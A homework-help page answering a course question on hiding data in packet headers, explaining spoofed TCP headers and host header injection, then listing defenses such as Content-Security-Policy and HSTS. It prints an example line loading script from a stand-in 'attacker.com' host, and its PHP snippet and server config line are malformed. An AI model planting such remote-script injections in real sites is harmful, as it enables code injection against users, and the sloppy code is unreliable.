HomeworkLib
Question

This week we discussed hiding data using packet headers and some common headers that are found...

This week we discussed hiding data using packet headers and some common headers that are found in most packets sent across a network, such as sequence number and acknowledgement number. Do some research and provide an actual example of a header being modified and your thoughts on how it was implemented. This can be an actual malware case, breach, white paper, or other similar example. For your example, can you think of any ways that it might be prevented or detected?
engineering   Computer-Science   
0 0
Add a comment Improve this question Transcribed image text
Next > < Previous
Sort answers by oldest

Homework Answers

Answer #1

Packet header modification is a process where header is changed such a way to penetrate into a network’s infrastructure. In this process, the attacker will collect important weak information regarding the network and then the attacker ensures that the attack is as “invisible” on the network so that the attack is undetected. For instance, spoofed source address with a fake TCP sequence number and the most interesting part is that the attacker does not to assemble the packer header from the start instead the attacker can catch the on going packet from the network and carry out the process. In-order to overcome the firewall, a packet header with a false source IP address with ACK field can be built to test the responses of a firewall. In the aspect of host header modification, the X-Forwarded-Host header is employed in which it will rewrite the value of the host header. For example, this PHP script is considered as host header modification:

<script src="http://<?php echo _SERVER['HOST'] ?>/script.js">

With this header, the attacker can modify code by creating HTML output :

<script src="http://attacker.com/script.js">

In-order prevent such kinds of attack, we can employ content-security-policy HTTP header provides security against Cross Site Scripting (XSS) and other code injection attacks. It first gathers content sources and filters based on the approval of content and loads it to the browser. The x-xss-protection header also provides protection, for example:

header always set x-xss-protection "1; mode=block" for apache server browser.

The strict-transport-security header is an important web browsers over HTTPS. It works by detecting insecure HTTP connection which could be prone to attacks.

0 0
Add a comment
Know the answer?
Add Answer to:
This week we discussed hiding data using packet headers and some common headers that are found...
Your Answer:

Post as a guest

Your Name:

What's your source?

Earn Coins

Coins can be redeemed for fabulous gifts.

Log In

Sign Up

Not the answer you're looking for? Ask your own homework help question. Our experts will answer your question WITHIN MINUTES for Free.
Similar Homework Help Questions

  • At this stage, you should be a Wireshark expert. Thus, we are not going to spell...

    At this stage, you should be a Wireshark expert. Thus, we are not going to spell out the steps as explicitly as in earlier labs. In particular, we are not going to provide example screenshots for all the steps. 1.   Start capturing packets in Wireshark and then do something that will cause your host to send and receive several UDP packets (Note that DNS is using UDP for communications. You can use nslookup commands in Lab 4 to generate DNS...

  • check my answers for Networking I came up with these answers, can check my answers Question...

    check my answers for Networking I came up with these answers, can check my answers Question 1: General What data rate is needed to transmit an uncompressed 4" x 6" photograph every second with a resolution of 1200 dots per inch and 24 bits per dot (pixel)? 691,200 kb/s 28.8 kb/s 8.29 Mb/s 829 Mb/s Question 2: Layering "Layering" is commonly used in computer networks because (check all that apply): -It forces all network software to be written in ‘C’....

  • A new version of the operating system is being planned for installation into your department’s production...

    A new version of the operating system is being planned for installation into your department’s production environment. What sort of testing would you recommend is done before your department goes live with the new version? Identify each type of testing and describe what is tested. Explain the rationale for performing each type of testing. [ your answer goes here ] Would the amount of testing and types of testing to be done be different if you were installing a security...

  • Detecting Substrings (C++ Version) Introduction A very common task that is often performed by programs that...

    Detecting Substrings (C++ Version) Introduction A very common task that is often performed by programs that work with text files is the problem of locating a specific substring within the file. I am sure we’ve all done this many times when working with Word, Notepad, or other editors. Since we don’t have a GUI or other means of displaying the contents of a file all at once, let’s modify the problem slightly. Rather than locating a specific substring within a...

  • Risk management in Information Security today Everyday information security professionals are bombarded with marketing messages around...

    Risk management in Information Security today Everyday information security professionals are bombarded with marketing messages around risk and threat management, fostering an environment in which objectives seem clear: manage risk, manage threat, stop attacks, identify attackers. These objectives aren't wrong, but they are fundamentally misleading.In this session we'll examine the state of the information security industry in order to understand how the current climate fails to address the true needs of the business. We'll use those lessons as a foundation...

  • i have the case study question with the answers but i need help to re-write the...

    i have the case study question with the answers but i need help to re-write the answers. please see the attached files Case Study Analysis (CSF3003) Assessment Description and Requirements CLO1: Case Study 1 Ahmad lef home to study master and PhD in Australia. He has fees for the first semester only. After he arrived to Sydney and settled down, he start looking for a part-time job to save money for the next term. Ahmad has some experience on making...

  • First, read the article on "The Delphi Method for Graduate Research." ------ Article is posted below...

    First, read the article on "The Delphi Method for Graduate Research." ------ Article is posted below Include each of the following in your answer (if applicable – explain in a paragraph) Research problem: what do you want to solve using Delphi? Sample: who will participate and why? (answer in 5 -10 sentences) Round one questionnaire: include 5 hypothetical questions you would like to ask Discuss: what are possible outcomes of the findings from your study? Hint: this is the conclusion....

  • I need help with my very last assignment of this term PLEASE!!, and here are the instructions: After reading Chapter T...

    I need help with my very last assignment of this term PLEASE!!, and here are the instructions: After reading Chapter Two, “Keys to Successful IT Governance,” from Roger Kroft and Guy Scalzi’s book entitled, IT Governance in Hospitals and Health Systems, please refer to the following assignment instructions below. This chapter consists of interviews with executives identifying mistakes that are made when governing healthcare information technology (IT). The chapter is broken down into subheadings listing areas of importance to understand...

  • 10. Write a one-page summary of the attached paper? INTRODUCTION Many problems can develop in activated...

    10. Write a one-page summary of the attached paper? INTRODUCTION Many problems can develop in activated sludge operation that adversely affect effluent quality with origins in the engineering, hydraulic and microbiological components of the process. The real "heart" of the activated sludge system is the development and maintenance of a mixed microbial culture (activated sludge) that treats wastewater and which can be managed. One definition of a wastewater treatment plant operator is a "bug farmer", one who controls the aeration...

ADVERTISEMENT
Free Homework Help App
Download From Google Play
Scan Your Homework
to Get Instant Free Answers
Need Online Homework Help?
Ask a Question
Get Answers For Free
Most questions answered within 3 hours.
ADVERTISEMENT
ADVERTISEMENT